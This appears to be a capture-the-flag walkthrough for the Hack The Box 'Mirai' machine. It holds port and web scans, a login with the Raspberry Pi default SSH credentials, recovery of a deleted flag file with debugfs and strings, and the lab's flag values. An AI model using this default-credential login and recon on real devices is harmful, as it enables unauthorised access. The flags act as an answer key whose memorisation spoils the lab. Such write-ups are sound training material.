Mirai 10.10.10.48

Nmap

  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
  | ssh-hostkey:
  |   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
  |   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
  |   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
  |_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (EdDSA)
  53/tcp open  domain  dnsmasq 2.76
  | dns-nsid:
  |_  bind.version: dnsmasq-2.76
  80/tcp open  http    lighttpd 1.4.35
  | http-methods:
  |_  Supported Methods: OPTIONS GET HEAD POST
  |_http-server-header: lighttpd/1.4.35

address      mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------  ---------  -----  -------  ----  --------
10.10.10.48             Linux               3.X    server

host         port  proto  name    state  info
----         ----  -----  ----    -----  ----
10.10.10.48  22    tcp    ssh     open   OpenSSH 6.7p1 Debian 5+deb8u3 protocol 2.0
10.10.10.48  53    tcp    domain  open   dnsmasq 2.76
10.10.10.48  80    tcp    http    open   lighttpd 1.4.35

Nikto
  Uncommon header 'x-pi-hole' found, with contents: A black hole for Internet advertisements.
  + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
  + Cookie PHPSESSID created without the httponly flag
  + OSVDB-3092: /admin/: This might be interesting...
  + OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.

Dirb
  ---- Scanning URL: http://10.10.10.48/ ----
  ==> DIRECTORY: http://10.10.10.48/admin/
  + http://10.10.10.48/swfobject.js (CODE:200|SIZE:61)

  ---- Entering directory: http://10.10.10.48/admin/ ----
  + http://10.10.10.48/admin/.git/HEAD (CODE:200|SIZE:23)
  ==> DIRECTORY: http://10.10.10.48/admin/img/
  + http://10.10.10.48/admin/index.php (CODE:200|SIZE:14617)
  + http://10.10.10.48/admin/LICENSE (CODE:200|SIZE:14164)
  ==> DIRECTORY: http://10.10.10.48/admin/scripts/
  ==> DIRECTORY: http://10.10.10.48/admin/style/

  ---- Entering directory: http://10.10.10.48/admin/img/ ----

  ---- Entering directory: http://10.10.10.48/admin/scripts/ ----
  ==> DIRECTORY: http://10.10.10.48/admin/scripts/vendor/

  ---- Entering directory: http://10.10.10.48/admin/style/ ----
  ==> DIRECTORY: http://10.10.10.48/admin/style/vendor/

  ---- Entering directory: http://10.10.10.48/admin/scripts/vendor/ ----
  + http://10.10.10.48/admin/scripts/vendor/LICENSE (CODE:200|SIZE:1085)

  ---- Entering directory: http://10.10.10.48/admin/style/vendor/ ----
  + http://10.10.10.48/admin/style/vendor/LICENSE (CODE:200|SIZE:1085)

Uniscan
  File check:
  | [+] CODE: 200 URL: http://10.10.10.48/admin/help.php
  | [+] CODE: 200 URL: http://10.10.10.48/admin/index.php

Default password ssh
  user: pi
  password: raspberry

https://www.cs.montana.edu/courses/309/topics/4-disks/debugfs_example.html

Linux / ssh
  cat /etc/fstab
  cd media/usbstick
  sudo debugfs /dev/sdb
  debugfs -w
    open /dev/sdb -w
    ls -d
    cat <12>
    mi <12>
                          Mode    [0100644]
                       User ID    [0]
                      Group ID    [0]
                          Size    [0]
                 Creation time    [1502688435]
             Modification time    [1502688435]
                   Access time    [1502688430]
                 Deletion time    [1502688435]
                    Link count    [0]
              Block count high    [0]
                   Block count    [0]
                    File flags    [0x80000]
                    Generation    [0xa63921a0]
                      File acl    [0]
           High 32bits of size    [0]
              Fragment address    [0]
               Direct Block #0    [62218]
               Direct Block #1    [4]
               Direct Block #2    [0]
               Direct Block #3    [0]
               Direct Block #4    [0]
               Direct Block #5    [0]
               Direct Block #6    [0]
               Direct Block #7    [0]
               Direct Block #8    [0]
               Direct Block #9    [0]
              Direct Block #10    [0]
              Direct Block #11    [0]
                Indirect Block    [0]
         Double Indirect Block    [0]
         Triple Indirect Block    [0]

         debugfs: dump <12> /tmp/file.000


pi@raspberrypi:/media/usbstick $ strings /dev/sdb
  >r &
  /media/usbstick
  lost+found
  root.txt
  damnit.txt
  >r &
  >r &
  /media/usbstick
  lost+found
  root.txt
  damnit.txt
  >r &
  /media/usbstick
  2]8^
  lost+found
  root.txt
  damnit.txt
  >r &
  3d3e483143ff12ec505d026fa13e020b
  Damnit! Sorry man I accidentally deleted your files off the USB stick.
  Do you know if there is any way to get them back?
  -James





user.txt ff837707441b257a20e32199d7c8838d
root.txt
